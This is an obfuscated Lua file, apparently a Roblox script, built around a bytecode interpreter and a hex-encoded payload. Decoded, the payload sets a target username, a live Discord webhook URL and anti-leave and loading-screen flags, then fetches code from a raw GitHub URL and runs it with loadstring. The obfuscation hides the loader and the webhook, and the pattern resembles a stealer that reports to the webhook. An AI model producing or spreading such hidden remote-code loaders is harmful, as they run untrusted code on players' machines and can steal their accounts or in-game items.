--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.9) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v69=v2(v0(v30,16));if v19 then local v75=v5(v69,v19);v19=nil;return v75;else return v69;end end end);local function v20(v31,v32,v33)if v33 then local v70=(v31/((5 -(880 -(282 + 595)))^(v32-(2 -1))))%((3 -1)^(((v33-(2 -1)) -(v32-(620 -(555 + 64)))) + (932 -((2494 -(1523 + 114)) + 74)))) ;return v70-(v70%(569 -(367 + 201))) ;else local v71=(929 -(214 + 713))^(v32-(1 + 0)) ;return (((v31%(v71 + v71))>=v71) and 1) or (0 + 0) ;end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35=0 + (117 -(32 + 85)) ;local v36;local v37;while true do if (v35==(1 -0)) then return (v37 * (1321 -(68 + 997))) + v36 ;end if (v35==(1270 -(226 + 1024 + 20))) then v36,v37=v1(v16,v18,v18 + 1 + 1 );v18=v18 + (8 -6) ;v35=1;end end end local function v23()local v38,v39,v40,v41=v1(v16,v18,v18 + (960 -(892 + 65)) );v18=v18 + 4 ;return (v41 * (40022563 -23245347)) + (v40 * (121138 -55602)) + (v39 * 256) + v38 ;end local function v24()local v42=v23();local v43=v23();local v44=1 -0 ;local v45=(v20(v43,351 -(87 + 263) ,200 -(67 + 113) ) * (2^(24 + 0 + (799 -(368 + 423))))) + v42 ;local v46=v20(v43,51 -30 ,23 + 8 );local v47=((v20(v43,127 -95 )==(953 -(802 + 150))) and  -(2 -1)) or (1 -0) ;if (v46==(0 + 0)) then if (v45==(997 -(915 + 82))) then return v47 * (0 -(0 -0)) ;else v46=1 + 0 ;v44=0 -0 ;end elseif (v46==(3234 -((1087 -(10 + 8)) + 118))) then return ((v45==(0 -0)) and (v47 * ((1 -0)/(0 + 0)))) or (v47 * NaN) ;end return v8(v47,v46-1023 ) * (v44 + (v45/(2^(92 -40)))) ;end local function v25(v48)local v49;if  not v48 then v48=v23();if (v48==(0 -0)) then return "";end end v49=v3(v16,v18,(v18 + v48) -(443 -(416 + 26)) );v18=v18 + v48 ;local v50={};for v67=3 -2 , #v49 do v50[v67]=v2(v1(v3(v49,v67,v67)));end return v6(v50);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v51=0;local v52;local v53;local v54;local v55;local v56;local v57;local v58;local v59;while true do if (v51==(8 -6)) then v56=nil;v57=nil;v51=3 + 0 ;end if (v51~=(6 -3)) then else v58=nil;v59=nil;v51=4;end if ((0 -0)==v51) then v52=0;v53=nil;v51=1 -0 ;end if (v51~=(11 -7)) then else while true do if (v52~=0) then else local v93=285 -(134 + 151) ;while true do if ((1665 -(970 + 695))~=v93) then else v53=0 -0 ;v54=nil;v93=1991 -(582 + 1408) ;end if (v93~=(3 -2)) then else v52=1;break;end end end if (v52~=(3 -0)) then else v59=nil;while true do local v95=0;local v96;while true do if (v95~=(0 -0)) then else v96=1824 -(1195 + 629) ;while true do if (v96==1) then if (v53~=(0 -0)) then else local v169=0;while true do if (v169~=(241 -(187 + 54))) then else v54={};v55={};v169=781 -(162 + 618) ;end if (v169==(1 + 0)) then v56={};v57={v54,v55,nil,v56};v169=1638 -(1373 + 263) ;end if (v169~=2) then else v53=1001 -(451 + 549) ;break;end end end break;end if ((0 + 0)==v96) then local v109=0 -0 ;while true do if (v109~=0) then else if (v53~=1) then else local v172=0;while true do if (v172~=(1 -0)) then else for v176=1,v58 do local v177=0;local v178;local v179;local v180;local v181;while true do if (v177==2) then while true do if (v178~=(1384 -(746 + 638))) then else local v184=0 + 0 ;while true do if (v184~=1) then else v178=1 -0 ;break;end if (v184==0) then v179=341 -(218 + 123) ;v180=nil;v184=1;end end end if (v178==1) then v181=nil;while true do if (v179~=(1581 -(1535 + 46))) then else local v191=0 + 0 ;while true do if (v191==1) then v179=1 + 0 ;break;end if (v191==0) then local v193=560 -(306 + 254) ;while true do if (v193==0) then v180=v21();v181=nil;v193=1;end if (v193~=1) then else v191=1;break;end end end end end if (v179~=(1 + 0)) then else if (v180==(1 -0)) then v181=v21()~=(1467 -(899 + 568)) ;elseif (v180==2) then v181=v24();elseif (v180==(2 + 1)) then v181=v25();end v59[v176]=v181;break;end end break;end end break;end if ((2 -1)~=v177) then else local v183=603 -(268 + 335) ;while true do if (v183==(290 -(60 + 230))) then v180=nil;v181=nil;v183=573 -(426 + 146) ;end if (1==v183) then v177=1 + 1 ;break;end end end if (v177==(1456 -(282 + 1174))) then v178=0;v179=nil;v177=812 -(569 + 242) ;end end end v57[8 -5 ]=v21();v172=1 + 1 ;end if (v172==(1024 -(706 + 318))) then v58=v23();v59={};v172=1;end if (v172~=(1253 -(721 + 530))) then else v53=1273 -(945 + 326) ;break;end end end if (v53==(4 -2)) then local v173=0 + 0 ;local v174;while true do if (v173~=0) then else v174=700 -(271 + 429) ;while true do if (v174~=(0 + 0)) then else local v182=0;while true do if (v182~=1) then else v174=1;break;end if (v182==0) then for v185=1,v23() do local v186=1500 -(1408 + 92) ;local v187;local v188;while true do if (v186==(1087 -(461 + 625))) then while true do if (v187~=0) then else v188=v21();if (v20(v188,1289 -(993 + 295) ,1 + 0 )~=(1171 -(418 + 753))) then else local v194=0 + 0 ;local v195;local v196;local v197;local v198;while true do if (v194~=(1 + 1)) then else while true do if (v195==(0 + 0)) then local v199=0;while true do if (0==v199) then v196=v20(v188,2,3);v197=v20(v188,2 + 2 ,6);v199=530 -(406 + 123) ;end if (v199==(1770 -(1749 + 20))) then v195=1;break;end end end if (v195~=3) then else if (v20(v197,1 + 2 ,3)~=1) then else v198[4]=v59[v198[4]];end v54[v185]=v198;break;end if (v195==(1324 -(1249 + 73))) then local v201=0;while true do if (v201==(0 + 0)) then if (v20(v197,1146 -(466 + 679) ,2 -1 )~=1) then else v198[2]=v59[v198[5 -3 ]];end if (v20(v197,2,2)==(1901 -(106 + 1794))) then v198[1 + 2 ]=v59[v198[3]];end v201=1;end if (v201~=1) then else v195=3;break;end end end if (v195==(1 + 0)) then v198={v22(),v22(),nil,nil};if (v196==(114 -(4 + 110))) then local v204=584 -(57 + 527) ;local v205;local v206;while true do if (0~=v204) then else v205=0;v206=nil;v204=1;end if ((1428 -(41 + 1386))~=v204) then else while true do if (v205==0) then v206=0;while true do if (v206==0) then v198[106 -(17 + 86) ]=v22();v198[3 + 1 ]=v22();break;end end break;end end break;end end elseif (v196==(1 -0)) then v198[8 -5 ]=v23();elseif (v196==(168 -(122 + 44))) then v198[3]=v23() -((2 -0)^(52 -36)) ;elseif (v196~=3) then else local v213=0;local v214;while true do if (0==v213) then v214=0 + 0 ;while true do if (v214~=0) then else v198[3]=v23() -((1 + 1)^16) ;v198[7 -3 ]=v22();break;end end break;end end end v195=67 -(30 + 35) ;end end break;end if (v194==1) then v197=nil;v198=nil;v194=2 + 0 ;end if (v194~=0) then else v195=0;v196=nil;v194=1258 -(1043 + 214) ;end end end break;end end break;end if (v186==(0 -0)) then v187=0;v188=nil;v186=1;end end end for v189=1,v23() do v55[v189-(1213 -(323 + 889)) ]=v28();end v182=2 -1 ;end end end if (v174~=(581 -(361 + 219))) then else return v57;end end break;end end end v109=1;end if (v109==1) then v96=321 -(53 + 267) ;break;end end end end break;end end end break;end if (v52==(1 + 1)) then v57=nil;v58=nil;v52=416 -(15 + 398) ;end if (v52==1) then local v94=982 -(18 + 964) ;while true do if (v94~=(0 -0)) then else v55=nil;v56=nil;v94=1;end if (v94~=(1 + 0)) then else v52=2;break;end end end end break;end if (v51==(1 + 0)) then v54=nil;v55=nil;v51=2;end end end local function v29(v60,v61,v62)local v63=0;local v64;local v65;local v66;while true do if (v63==1) then v66=v60[3];return function(...)local v76=v64;local v77=v65;local v78=v66;local v79=v27;local v80=1;local v81= -1;local v82={};local v83={...};local v84=v12("#",...) -1 ;local v85={};local v86={};for v90=0,v84 do if (v90>=v78) then v82[v90-v78 ]=v83[v90 + 1 ];else v86[v90]=v83[v90 + 1 ];end end local v87=(v84-v78) + 1 ;local v88;local v89;while true do v88=v76[v80];v89=v88[1];if (v89<=5) then if (v89<=2) then if (v89<=0) then v86[v88[2]]();elseif (v89==1) then v86[v88[2]][v88[3]]=v88[4];else v86[v88[2]]=v62[v88[3]];end elseif (v89<=3) then local v101=v88[2];local v102=v86[v88[3]];v86[v101 + 1 ]=v102;v86[v101]=v102[v88[4]];elseif (v89==4) then local v114=v88[2];v86[v114]=v86[v114](v13(v86,v114 + 1 ,v81));else local v116;local v117,v118;local v119;local v120;v86[v88[2]][v88[3]]=v88[4];v80=v80 + 1 ;v88=v76[v80];v86[v88[2]]=v62[v88[3]];v80=v80 + 1 ;v88=v76[v80];v86[v88[2]]=v62[v88[3]];v80=v80 + 1 ;v88=v76[v80];v120=v88[2];v119=v86[v88[3]];v86[v120 + 1 ]=v119;v86[v120]=v119[v88[4]];v80=v80 + 1 ;v88=v76[v80];v86[v88[2]]=v88[3];v80=v80 + 1 ;v88=v76[v80];v86[v88[2]]=v88[3]~=0 ;v80=v80 + 1 ;v88=v76[v80];v120=v88[2];v117,v118=v79(v86[v120](v13(v86,v120 + 1 ,v88[3])));v81=(v118 + v120) -1 ;v116=0;for v139=v120,v81 do v116=v116 + 1 ;v86[v139]=v117[v116];end v80=v80 + 1 ;v88=v76[v80];v120=v88[2];v86[v120]=v86[v120](v13(v86,v120 + 1 ,v81));v80=v80 + 1 ;v88=v76[v80];v86[v88[2]]();v80=v80 + 1 ;v88=v76[v80];do return;end end elseif (v89<=8) then if (v89<=6) then v62[v88[3]]=v86[v88[2]];elseif (v89>7) then v86[v88[2]]=v88[3]~=0 ;else v86[v88[2]]=v88[3];end elseif (v89<=9) then local v108=0;while true do if (6==v108) then v86[v88[2]]=v62[v88[3]];v80=v80 + 1 ;v88=v76[v80];v86[v88[2]][v88[3]]=v88[4];break;end if (v108==1) then v80=v80 + 1 ;v88=v76[v80];v86[v88[2]]=v88[3];v80=v80 + 1 ;v108=2;end if (v108==4) then v80=v80 + 1 ;v88=v76[v80];v86[v88[2]]=v62[v88[3]];v80=v80 + 1 ;v108=5;end if (v108==2) then v88=v76[v80];v62[v88[3]]=v86[v88[2]];v80=v80 + 1 ;v88=v76[v80];v108=3;end if (v108==5) then v88=v76[v80];v86[v88[2]][v88[3]]=v88[4];v80=v80 + 1 ;v88=v76[v80];v108=6;end if (v108==0) then v86[v88[2]]=v88[3];v80=v80 + 1 ;v88=v76[v80];v62[v88[3]]=v86[v88[2]];v108=1;end if (v108==3) then v86[v88[2]]=v88[3];v80=v80 + 1 ;v88=v76[v80];v62[v88[3]]=v86[v88[2]];v108=4;end end elseif (v89==10) then local v135=v88[2];local v136,v137=v79(v86[v135](v13(v86,v135 + 1 ,v88[3])));v81=(v137 + v135) -1 ;local v138=0;for v167=v135,v81 do local v168=0;while true do if (0==v168) then v138=v138 + 1 ;v86[v167]=v136[v138];break;end end end else do return;end end v80=v80 + 1 ;end end;end if (v63==0) then v64=v60[1];v65=v60[2];v63=1;end end end return v29(v28(),{},v17)(...);end v15("LOL!0F3O0003083O00557365724E616D65030A3O0069676F725F6B6C696E6703073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O313235333833393633352O31332O373938312F31727672683758767735376E534A537734747559337572357558684C4766713054516B39434774734D71396F67667273757331476770664869437439694C577A32354C3103093O00557365724E616D6532030A3O0049676F725F6B6C696E6703023O005F47030D3O004C6F6164696E675363722O656E2O0103093O00416E74694C6561766503093O004D6F7573654C6F636B030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403463O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F4D6F7269536372697074732F6D61696E2F4D6F72695363726970745A00153O0012093O00023O00124O00013O00124O00043O00124O00033O00124O00063O00124O00053O00124O00073O00304O0008000900124O00073O00304O000A00090012023O00073O0030053O000B000900124O000C3O00122O0001000D3O00202O00010001000E00122O0003000F6O000400016O000100049O0000026O000100016O00017O00",v9(),...);end
